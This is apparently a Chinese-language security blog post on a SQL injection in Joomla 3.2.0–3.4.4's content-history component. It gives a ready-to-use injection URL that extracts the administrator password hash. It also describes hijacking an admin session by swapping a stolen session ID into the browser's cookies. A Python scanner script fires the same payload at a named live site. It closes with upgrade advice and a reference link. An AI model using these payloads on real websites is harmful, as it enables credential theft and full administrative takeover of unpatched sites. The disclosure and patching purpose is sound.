概述:

漏洞出在核心模块,因此不需要任何扩展,所有使用joomla 3.2以上版本的站点,都受此漏洞影响

存在SQL注入的地方位于 /administrator /components /com_contenthistory/models/history.php,漏洞出在getListQuery()函数,代码如下

当请求

能够通过注入从数据库里返回session ID

如果得到的是管理员的session ID ,则可以通过修改当前浏览器的cookies里的session ID ,然后访问/administrator/ 就可以登陆管理员后台了。

经过改进，可用如下payload直接获取管理员密码：

http://10.211.55.3/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

其中%23_即为joomla表前缀，无需获取表前缀，joomla会自动将#_转换为表前缀。

$2y$10$Q8EO/7wagz3TxNvUyiFB1eMRBpv45jX2Jvk251ArYlV7p3.OC0hNa1 去掉最后那个1 然后解密

Joomla 3.2.0 - 3.4.4 history.php SQLi

[python]

#!/usr/bin/env python
#-*- coding:utf-8 -*-

import requests
import sys
reload(sys)
sys.setdefaultencoding("utf-8")

def Joomla_history_SQLi(url):
urlA = url+'/index.php%3Foption%3Dcom_contenthistory%26view%3Dhistory%26list%5Bordering%5D%3D%26item_id%3D1%26type_id%3D1%26list%5Bselect%5D%3D%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28%28select%200x73656370756c73655f636f6d%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29'
try:
result = requests.get(urlA,timeout=5,allow_redirects=True,verify=False).content
if 'secpulse_com' in result:
print 'Joomla 3.2.0 - 3.4.4 history.php SQLi Found!'
else:
print 'No vuls'
except Exception,e:
print e

if __name__ == '__main__':
Joomla_history_SQLi('http://www.secpulse.com')

[/python]

受影响版本及补救措施:

3.2 到 3.4.4

如果你正在使用低版本的joomla,请立即去官方更新到最新版https://github.com/joomla/joomla-cms/releases/download/3.4.5/Joomla_3.4.5-Stable-Full_Package.zip

更多技术细节:

https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/